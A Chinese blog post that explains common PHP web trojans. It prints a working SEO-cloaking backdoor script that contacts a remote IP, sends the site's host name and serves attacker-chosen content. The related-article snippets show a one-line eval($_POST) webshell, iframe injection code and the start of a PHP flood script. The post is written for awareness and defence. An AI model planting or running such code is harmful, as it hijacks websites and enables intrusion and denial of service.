打开php网页中木马,常见PHP网页木马

最新推荐文章于 2022-02-16 15:33:58 发布
最新推荐文章于 2022-02-16 15:33:58 发布
阅读量731 收藏 1
点赞数
文章标签: 打开php网页中木马

# 常见的PHP网页木码

>[success]网站上线后,就容易被恶意挂码,除了做好网站安全外,还要了解,常见的挂码方式。

>

## 下面就是一个恶意的代码

>[success]这种的还不算是最为严中的,他只是让在你的站点中增加了一个php文件,当搜索引擎访问题,会打开他们指定的内容。

>

>[success]这种攻击,一般会在站点根目录生成一个`global`文件,下面的php文件,就是通过这个文件生成的。

~~~

set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");

$Remote_server = "http://122.114.242.133/";

$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];

$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);

function getHTTPPage($url) {

$opts = array(

'http'=>array(

'method'=>"GET",

'header'=>"User-Agent: aQ0O010O"

)

);

$context = stream_context_create($opts);

$html = @file_get_contents($url, false, $context);

if (empty($html)) {

exit("

Connection Error!

");

}

return $html;

}

echo $Content_mb;

?>

~~~

>[danger]stream_context_create — 创建资源流上下文

>stream_context_create()模拟POST/GET,

~~~

//请求数据

$data =[

'name'=>'zhangsan',

'age'=>25,

];

//http_build_query — 生成 URL-encode 之后的请求字符串

$data = http_build_query($data);

//post请求地址

$url="http://www.127.0.0.1/test.php"

//配置请求方式及请求参数等

$options = array(

'http' => array(

'method' => 'POST',

'header' => 'Content-type:application/x-www-form-urlencoded',

'content' => $data

//'timeout' => 60 * 60 // 超时时间(单位:s)

)

);

//stream_context_create — 创建资源流上下文

$context = stream_context_create($options);

//获取数据

$result = file_get_contents($url, false, $context);

~~~

冷淡熊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
寻找PHP网站)挂马,后门
MiltonZhong
08-02 7025
php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_r
php exec回显_木马小工具(php版)——网页操控肉鸡服务器
weixin_39620197的博客
12-21 541
如何通过一个文本文件的网页来控制服务器呢?在服务器上执行命令在网页上返回执行结果使用思路基于web的木马上传到靶机的apache服务器通过web访问将命令传给木马木马接收命令在服务器端执行将执行结果(服务器的信息)返回到web页面上使用的php函数php执行shell/cmd命令,可以使用下面几个函数: stringsystem(string$command[,int&...
网页木马太猖獗-网马反击战
weixin_34356555的博客
05-08 357
【标题】国家环保总局官方网站疑似被挂马—网页木马【内容】         前段时间,我们的品牌通 联系通 等网站相继遭遇网页木马,深受其害。今天,无意发现国家环保总局官方网站疑似被挂马。 现象截图:             网页木马相关技术总结:网页木马代码大全:一:框架挂马   <iframe src=地址 width=0 height=0></iframe> 二:js...
myup.php木马吗,微型PHP木马的探讨
weixin_36401802的博客
03-11 319
此文仅供参考学习之用!本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。PHP语法的强大是ASP望尘莫及的,仅一个: phpinfo();?>就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PH...
php 木马 加密,PHP后门木马详解
weixin_39625987的博客
03-09 819
说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考。php后门木马对大家来说一点都不陌生吧但是它的种类您又知多少呢本文为您浅析说明一些php后门木马常用的函数。php后门木马常用的函数大致上可分为四种类型1. 执行系统命令: system, passthru, shell_exec, ex...
发现一php木马代码
diandu3502的博客
12-13 1万+
<?php ;//无需验证密码! $shellname='hello~地球~猴子星球欢迎你 '; define('myaddress',__FILE__); error_reporting(E_ERROR | E_PARSE); header("content-Type: text/html; charset=gb2312"); @set_time_limit...
Linux查找php木马程序例子
01-20
php木马其实是一个正常的php文件了,只是我们给了权限太高导致这个程序可以执行系统文件或调用系统命令来操作从而得到了服务器相关权限了,这样对方可以随时拿我们程序或数据库了,下面我来给各位介绍一些查找php...
防御php木马.zip
01-05
在网络安全领域,PHP木马常见的威胁之一,它们可以被黑客用来控制服务器,执行恶意代码,窃取数据,甚至利用服务器作为攻击其他系统的跳板。本文将深入探讨如何防御PHP木马,主要围绕三个关键点:限制Apache操作...
PHP 木马攻击防御技巧
12-18
虽然这在大型虚拟主机环境更为常见,但对于防止PHP木马,这样的配置可能显得过于复杂。 最后,定期检查和扫描代码库,使用木马检测工具查找潜在的威胁也至关重要。了解PHP木马常见特征,如“一句话木马”及其...
php 木马的分析(加密破解)
10-29
1. PHP木马的概念:PHP木马是一种常见的服务器端恶意程序,通常被黑客上传到目标服务器上,用来获取服务器的控制权或执行非法操作。由于PHP是一种广泛应用于网站开发的服务器端脚本语言,使得攻击者能够利用它编写...
众星网页木马扫描_1.6.rar
07-22
一直想做个木马扫描工具,于是公司同事不务正业的做了一个,就是测试版,window系统下使用,大家拿去参考,里面有几个木马样本。 只能学习一下。
php木马脚步,一个PHP木马的代码
weixin_34375356的博客
03-11 171
set_time_limit(999999);$host = $_GET[‘host’];$port = $_GET[‘port’];$exec_time = $_GET[‘time’];$Sendlen = 128;$packets = 0;ignore_user_abort(True);if (StrLen($host)==0 or StrLen($port)==0 or StrLen($ex...
PHP木马
qq_41272376的博客
02-16 4734
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
Web-一句话木马php
weixin_46685211的博客
05-05 5942
文章目录前言一、什么是webshell二、一句话木马1.基本原理2.上传文件到网站流程3.语句解析4.入侵条件参考 前言 在BUU CTF做到一道题,[ACTF2020 新生赛]Upload 1。要求upload,这个时候应该想到是一句话木马的题目。在攻防世界的web新手区webshell也是一个一句话木马的题目。 一、什么是webshell webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网
PHP一句话木马
weixin_64338385的博客
12-03 1073
Get、 Post、Assert 首先在www目录下创建出对应文件 以 .php后缀名 Get输入 <?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行 ?> 保存之后在网页访问 127.0.0.1/get.php?cmd=system(‘ipconfig’); 输入whoami,访问用户名 Post <?php @eval($_POST[‘cmd’]); ?> Post ...
PHP之一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
二行代码解决全部网页木马
php菜鸟技术天地
06-02 1434
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。   前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值